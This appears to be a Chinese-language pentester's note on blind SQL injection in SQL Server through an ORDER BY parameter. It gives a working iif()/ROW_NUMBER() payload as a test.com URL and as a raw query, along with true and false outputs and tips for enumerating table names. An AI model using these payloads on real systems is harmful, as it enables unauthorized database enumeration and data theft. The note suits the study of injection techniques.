0x01 前言

与普通注入无异,记一下语法即可

关于更多SQL Server的爆错方法:https://www.yuque.com/avenue-le/bmhg6h/qzy0h3

0x01 基本数据

  1. 1> select * from article;
  2. 2> go
  3. +----+-----------+-----------+
  4. | id | title       | content    |
  5. +----+-----------+-----------+
  6. |  1 | 测试标题  | 测试内容  |
  7. |  2 | 测试标题2 | 测试内容2 |
  8. +----+-----------+-----------+
  9. (2 rows affected)
  1. # 测试表数据: users;
  3. sql server> select * from users;
  4. +----+--------------+----------+
  5. | id | username     | password |
  6. +----+--------------+----------+
  7. |  1 | test-user-01 |  123456  | 
  8. |  2 | test-user-02 |  234567  |
  9. +----+--------------+----------+
  10. 2 rows in set (0.00 sec)
  1. sql server> SELECT system_user;
  2. +-----------------------+
  3. | field1                |
  4. +-----------------------+
  5. | sa                    |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)
  1. sql server> select db_name();
  2. +-----------------------+
  3. | field1                |
  4. +-----------------------+
  5. | test                  |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)

0x02 猜表名

注意:
OVER(Order by table_name) 里面的 table_name 要修改为 information_schema.tables 表里面存在的一个字段

修改 LEFT() 函数 第二个参数可以控制出来得数据

查询不同的库可以这样
例如:
table_catalog=db_name() (查询当前库)
table_catalog=’要查询的库名’

查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?orderby=id-iif((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1)like’%article%’,1,’x’)

数据库语句: SELECT * from article order by id-iif((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1)like’%article%’,1,’x’) desc

  1. # 查询当前库 表一名称
  3. # 对的情况
  4. 1> SELECT
  5.     *
  6. FROM
  7.     article
  8. ORDER BY
  9.     id - iif (
  10.         (
  11.             SELECT
  12.                 table_name
  13.             FROM
  14.                 (
  15.                     SELECT
  16.                         ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  17.                         table_name
  18.                     FROM
  19.                         information_schema.tables
  20.                     WHERE
  21.                         table_catalog = db_name()
  22.                 ) AS a
  23.             WHERE
  24.                 row_number = 1
  25.         ) LIKE '%article%',
  26.         1,
  27.         'x'
  28.     ) DESC;
  29. 2> go
  30. +----+-----------+-----------+
  31. | id | title       | content    |
  32. +----+-----------+-----------+
  33. |  2 | 测试标题2 | 测试内容2 |
  34. |  1 | 测试标题  | 测试内容  |
  35. +----+-----------+-----------+
  36. (2 rows affected)
  40. # 错误的情况
  41. 1> SELECT
  42.     *
  43. FROM
  44.     article
  45. ORDER BY
  46.     id - iif (
  47.         (
  48.             SELECT
  49.                 table_name
  50.             FROM
  51.                 (
  52.                     SELECT
  53.                         ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  54.                         table_name
  55.                     FROM
  56.                         information_schema.tables
  57.                     WHERE
  58.                         table_catalog = db_name()
  59.                 ) AS a
  60.             WHERE
  61.                 row_number = 1
  62.         ) LIKE '%aaaaaaaaaaa%',
  63.         1,
  64.         'x'
  65.     ) DESC;
  66. 2> go
  67. 22018 - [SQL Server]在将 varchar  'x' 转换成数据类型 int 时失败。